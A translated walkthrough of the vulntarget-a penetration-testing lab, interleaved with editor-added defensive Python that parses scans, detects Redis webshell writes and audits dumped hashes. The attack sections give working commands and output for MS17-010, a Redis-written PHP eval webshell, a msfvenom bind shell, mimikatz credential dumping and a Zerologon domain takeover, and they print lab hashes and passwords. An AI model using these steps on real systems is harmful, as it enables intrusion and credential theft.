✎ Reading notes
烏鴉安全 (Crow Security) technical articles are for reference only. The information in this article is provided solely so that network security staff can test or maintain the websites, servers and other assets they are responsible for (including but not limited to these). Do not use the technical material in this article to intrude on any computer system without authorization. Any direct or indirect consequences and losses caused by using the information in this article are the sole responsibility of the user.
烏鴉安全 reserves the right to modify, delete and interpret this article. If you repost or distribute it, the article must be kept intact; reposting without permission is prohibited!
The tools provided in this article are for learning only and must not be used for anything else. Please delete the tool files within 24 hours!!!
Author: 夏天 (Xia Tian). Published with the author's permission.
vulntarget disclaimer
The vulntarget lab series is provided only for security professionals to practice penetration-testing techniques. The information in these labs is provided solely so that network security staff can test or maintain the websites, servers and other assets they are responsible for (including but not limited to these). Do not use the technical material from the labs to intrude on any computer system without authorization. Any direct or indirect consequences and losses caused by using the information in these labs are the sole responsibility of the user.
The vulntarget lab series reserves the right to modify, delete and interpret the labs; unauthorized use for any other purpose is prohibited.
vulntarget repository:
https://github.com/crow821/vulntarget
Stars are very welcome 🌟
vulntarget setup series
vulntarget vulnerability lab series (1)
vulntarget vulnerability lab series (2): vulntarget-b
vulntarget vulnerability lab series (3): vulntarget-c
1. Topology
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAjM2EzLcd3LcJzLcJzdllmVldWYtl2Pn5GcuAzYjFzNycjMwQjNlZmMhZTMzUGNwQmY2M2YjJTMhFmNvwFN1UTM2ADNtUGall3LcVmdhNXLwRHdo9CXt92YucWbpRWdvx2Yx5yazF2Lc9CX6MHc0RHaiojIsJye.png)
Lab download
Link: https://pan.baidu.com/s/195iUmvbaKOhtn2S_O-F6TA   extraction code: jnkq
Entry point: 192.168.0.4
Kali: 192.168.0.35
2. First layer
2.1 Port scan
Run nmap to see which ports are open:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC 192.168.0.4 -p- -T4 -v
Host is up (0.00083s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
|_http-favicon: Unknown favicon MD5: 1205AF91D6B1638C23DE1132AE0C7E0B
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-26T09:56:17+08:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:24:f0:bb (VMware)
| Names:
| WIN7-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WIN7-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-01-26T01:56:17
|_ start_date: 2022-01-26T01:49:34
SMB is open, so try an ms17-010 scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap --script=vuln 192.168.0.4 -p 445,135,139 -T4 -v
Host is up (0.0011s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
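As an added example, not part of the original write-up, the following Python turns nmap's normal output, like the two runs above, into a short finding list a defender can act on: the MS17-010 result, the SMB signing state and the cookie flag. The sample text is constructed from the output shown above; the severities, fix advice and function names are the editor's.

```python
import re

# Constructed sample: the lines of the two nmap runs above that the parser needs.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
|_smb-vuln-ms10-054: false
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$")
# An NSE script name is lowercase with at least one hyphen (smb-vuln-ms17-010);
# nested keys such as "account_used:" or "State:" never match this.
SCRIPT_RE = re.compile(r"^\|_?\s*(?P<name>[a-z][a-z0-9]*(?:-[a-z0-9]+)+):\s*(?P<rest>.*)$")


def parse_nmap(text):
    """Return (ports, scripts): ports is a list of dicts for the port table,
    scripts maps NSE script name -> the output lines attributed to it."""
    ports, scripts, current = [], {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                          "service": m["service"], "version": m["version"] or ""})
            current = None
            continue
        if not line.startswith("|"):
            continue
        head = SCRIPT_RE.match(line)
        if head:
            current = head["name"]
            scripts.setdefault(current, [])
            if head["rest"]:
                scripts[current].append(head["rest"])
        elif current:
            scripts[current].append(re.sub(r"^\|_?\s*", "", line))
    return ports, scripts


def assess(ports, scripts):
    """Map the parsed scan onto (severity, finding, fix) tuples."""
    findings = []
    open_ports = {p["port"] for p in ports if p["state"] == "open"}
    ms17 = scripts.get("smb-vuln-ms17-010", [])
    if 445 in open_ports and any("State: VULNERABLE" in l for l in ms17):
        findings.append(("critical", "MS17-010 (CVE-2017-0143) SMBv1 RCE",
                         "apply the MS17-010 update and disable SMBv1"))
    if any("message_signing: disabled" in l for l in scripts.get("smb-security-mode", [])):
        findings.append(("medium", "SMB1 message signing disabled",
                         "require SMB signing via Group Policy"))
    if any("enabled but not required" in l for l in scripts.get("smb2-security-mode", [])):
        findings.append(("medium", "SMB2 message signing not required",
                         "set RequireSecuritySignature on the server"))
    if any("httponly flag not set" in l for l in scripts.get("http-cookie-flags", [])):
        findings.append(("low", "session cookie without HttpOnly",
                         "set session.cookie_httponly in PHP"))
    return findings


if __name__ == "__main__":
    for sev, what, fix in assess(*parse_nmap(NMAP_OUTPUT)):
        print(f"[{sev}] {what}: {fix}")
```

The script-name heuristic relies on nmap's naming convention rather than indentation, so it still works on output whose leading spaces were stripped, as in the listing above.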
nmap finds the ms17-010 vulnerability; port 80 is open as well.
2.2 Tongda OA getshell
http://192.168.0.4/rA4WmWb.php
Password: x
Connecting with AntSword (蟻劍) gives system privileges directly.
2.3 MS17-010
The scan shows it is present. Grab the credentials:
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
win7 win7-PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN7-PC$ WORKGROUP (null)
win7 win7-PC admin
tspkg credentials
=================
Username Domain Password
-------- ------ --------
win7 win7-PC admin
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
win7 win7-PC admin
win7-pc$ WORKGROUP (null)
An internal subnet is found: 10.0.20.98. Migrate the process automatically and add a route:
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN7-PC
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3728
[+] Successfully migrated into process 3728
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
3. Lateral movement to the second machine
Scan the 10.0.20.0/24 subnet:
use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,8081,3389,445,143,6379
set rhosts 10.0.20.0/24
set threads 20
run
.98 is the win7 box we already own; .99 has 80 and 6379 open.
Start msf's socks5 proxy:
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
Scan for directories:
python3 dirsearch.py -u "http://10.0.20.99/" --proxy=socks5://localhost:1080
The web directory found:
C:\phpStudy\PHPTutorial\WWW\phpinfo.php
Nothing worth looking at there. Test 6379: unauthenticated access, on a Windows host with no outbound connectivity, so write a webshell:
┌──(kali㉿kali)-[~]
└─$ proxychains4 redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename xt.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
OK
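The sequence above (CONFIG SET dir to the web root, CONFIG SET dbfilename to a .php name, SET, SAVE) is exactly what a defender should alert on, because the RDB dump then lands as a script under the web server. As an added example, not part of the original write-up, the Python below runs that detection over constructed redis-cli MONITOR style lines and generalizes it to the other dump targets of the same trick (.ssh, cron, /etc); the sample lines, the web-root and extension lists, and the function names are the editor's assumptions.

```python
import re

# Constructed MONITOR-style lines modelled on the redis-cli session above plus
# two benign clients. Timestamps and client ports are made up.
SAMPLE_MONITOR = """\
1643162100.101 [0 10.0.20.98:49311] "CONFIG" "SET" "dir" "C:/phpStudy/PHPTutorial/WWW/"
1643162100.532 [0 10.0.20.98:49311] "CONFIG" "SET" "dbfilename" "xt.php"
1643162101.004 [0 10.0.20.98:49311] "SET" "1" "<?php @eval($_POST['xt']);?>"
1643162101.310 [0 10.0.20.98:49311] "SAVE"
1643162140.220 [0 10.0.20.50:51002] "SET" "session:42" "user=alice"
1643162141.001 [0 10.0.20.50:51002] "GET" "session:42"
1643162150.777 [0 10.0.20.60:50020] "CONFIG" "SET" "dbfilename" "dump.rdb"
1643162151.000 [0 10.0.20.60:50020] "BGSAVE"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # MONITOR quotes every argument

# Places where a dump file becomes code or credentials the host will trust.
WEB_ROOT_HINTS = ("www", "htdocs", "wwwroot", "inetpub")
SCRIPT_EXTS = (".php", ".jsp", ".jspx", ".asp", ".aspx", ".ashx", ".cgi")
SENSITIVE_DIRS = ("/.ssh", "/cron", "/etc/")
SENSITIVE_FILES = ("authorized_keys",)


def parse_monitor_line(line):
    """One MONITOR line -> {ts, client, args} or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m["ts"]), "client": m["client"], "args": ARG_RE.findall(m["args"])}


def _dump_is_dangerous(dir_, filename):
    d = (dir_ or "").lower().replace("\\", "/")
    f = (filename or "").lower()
    if f.endswith(SCRIPT_EXTS) or f in SENSITIVE_FILES:
        return "dump filename is a script or credential file"
    if any(h in d for h in WEB_ROOT_HINTS) or any(s in d for s in SENSITIVE_DIRS):
        return "dump directory is a web root or sensitive path"
    return None


def detect_rdb_abuse(monitor_text):
    """Return one alert per client that redirects the RDB dump with CONFIG SET
    and then forces a write with SAVE/BGSAVE; ordinary dumps are ignored."""
    state, alerts = {}, []
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        cmd = ev["args"][0].upper()
        st = state.setdefault(ev["client"], {"dir": None, "dbfilename": None, "changed": False})
        if cmd == "CONFIG" and len(ev["args"]) >= 4 and ev["args"][1].upper() == "SET":
            key = ev["args"][2].lower()
            if key in ("dir", "dbfilename"):
                st[key] = ev["args"][3]
                st["changed"] = True
        elif cmd in ("SAVE", "BGSAVE") and st["changed"]:
            reason = _dump_is_dangerous(st["dir"], st["dbfilename"])
            if reason:
                alerts.append({"client": ev["client"], "ts": ev["ts"], "dir": st["dir"],
                               "dbfilename": st["dbfilename"], "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect_rdb_abuse(SAMPLE_MONITOR):
        print(a)
```

Detection is the second line of defence here; the first is the configuration the lab deliberately leaves open: set requirepass, bind Redis to loopback or an internal interface only, rename or disable CONFIG for untrusted clients, and run the service under an account that cannot write to the web root.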
Connect with AntSword.
quser: the win2016 user is logged on.
ipconfig /all: domain name vulntarget.com; another internal IP, 10.0.10.111.
tasklist: check the processes and AV; Windows Defender is present.
Bind (forward-connect) msf session. Generate the shellcode:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8091 -f exe > 8091_bind.exe
Listener configuration:
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 8091 yes The listen port
RHOST 10.0.20.99 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.20.99:8091
The backdoor runs, but the session never comes in; the firewall is probably on. Add an inbound firewall rule:
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
Run it again and the session comes in. Load kiwi, migrate to a random process, and check the NTLM hashes:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2016
[*] Current server process: 8091_bind.exe (676)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 1764
[+] Successfully migrated into process 1764
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
WIN2016$ VULNTARGET aabc352125765ee443568d0cdf27d62a 0aeb385e9aa49fa7e0be911d3b17da00f2aa7acd
WIN2016$ VULNTARGET e0cd419213811fd910ca6c3c42d764e7 cd721f807e68ce07a4d0fe80b9356e93986d5ef1
win2016 VULNTARGET dfc8d2bfa540a0a6e2248a82322e654e cfa10f59337120a5ea6882b11c1c9f451f5f4ea6 27bd7cc4802079a6e008ed2d917c4323
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ VULNTARGET (null)
win2016 VULNTARGET (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ vulntarget.com NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$ vulntarget.com c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
win2016 VULNTARGET.COM (null)
win2016$ VULNTARGET.COM (null)
win2016$ VULNTARGET.COM c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
meterpreter >
win2016's password: Admin#123
Check the domain controller's computer name:
net group "domain controllers" /domain
WIN2019
Check the domain admins:
net group "enterprise admins" /domain
administrator
Ping the DC hostname to get its IP: 10.0.10.110. Add a route.
4. CVE-2020-1472: privilege escalation to the domain controller
Since we only have an ordinary domain user, go straight for the 1472 vulnerability: reset the account password to empty, then use secretsdump to fetch the hashes from the DC.
┌──(kali㉿kali)-[~/Desktop/CVE-2020-1472/EXP]
└─$ proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49674 ... OK
======================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Get the administrator (domain admin) hash:
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\[email protected] -just-dc -no-pass 127 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:64e86893159e2f036ee7d9a7a8312dfa9e2ab3b1435dcad3d372cac3d3530b54
WIN2016$:aes128-cts-hmac-sha1-96:efe65cbd2f33250e1f5d0baad8fa8719
WIN2016$:des-cbc-md5:911657540e94079b
[*] Cleaning up...
Successfully accessed the DC:
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected] 1 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
win2019
C:\Windows\system32>
Crack the hash: the password Admin@666 pops out in a second!!!!
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=./pass.txt ./winhash.txt --format=NT 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Admin@666 (Administrator)
1g 0:00:00:00 DONE (2022-01-26 01:58) 100.0g/s 508800p/s 508800c/s 508800C/s admin333..Admin99
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
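The dump above and the john run show what a defender can audit directly from an NTDS extract: machine accounts with an empty NT hash (WIN2019$ shows 31d6cfe0d16ae931b73c59d7e0c089c0, the hash of the empty string, which is exactly what the Zerologon reset leaves behind), accounts whose hash matches a short list of known-bad passwords, and any account still storing an LM hash. Added example, not part of the original write-up and not impacket's or john's code: the Python below implements MD4 itself (hashlib's MD4 is often disabled by OpenSSL), parses secretsdump-format lines and reports those three conditions. The sample dump is the DC dump shown above plus one constructed line for the win7 local account built from the mimikatz output in section 2.3; the candidate list and function names are the editor's.

```python
import re
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of the empty string

# Sample dump: the DC lines from the secretsdump run above, plus one constructed
# line for the win7 local account (its LM/NT hashes come from the mimikatz
# output in section 2.3; the RID 1001 is made up).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
win7:1001:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
"""
CANDIDATES = ["admin", "Admin@666", "Admin#123", "Password1"]  # constructed known-bad list

DUMP_RE = re.compile(r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(message: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python, so it works where OpenSSL has MD4 disabled."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    data = message + b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", len(message) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a, b, c, d = d, _rotl((a + f(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, _rotl((a + g(b, c, d) + X[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, _rotl((a + h(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = [(s + t) & 0xFFFFFFFF for s, t in zip((a0, b0, c0, d0), (a, b, c, d))]
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password (unsalted)."""
    return md4(password.encode("utf-16-le")).hex()


def audit_dump(dump_text, candidates):
    """Return {account: [issues]} for empty passwords, known-bad passwords and stored LM hashes."""
    by_hash = {nt_hash(p): p for p in candidates}
    findings = {}
    for line in dump_text.splitlines():
        m = DUMP_RE.match(line.strip())
        if not m:
            continue
        issues = []
        if m["nt"] == EMPTY_NT:
            tag = " (machine account: check for CVE-2020-1472 abuse)" if m["user"].endswith("$") else ""
            issues.append("empty password" + tag)
        elif m["nt"] in by_hash:
            issues.append(f"known-bad password {by_hash[m['nt']]!r}")
        if m["lm"] != EMPTY_LM:
            issues.append("LM hash stored (NoLMHash not enforced)")
        if issues:
            findings[m["user"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP, CANDIDATES).items():
        print(f"{user}: {'; '.join(issues)}")
```

Because the NT hash is unsalted, a single MD4 per candidate covers every account in the dump, which is also why john finished the Administrator hash instantly above: the cost of this audit is the same whether it is run by the defender or by an intruder, so the only durable fix is the password itself.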
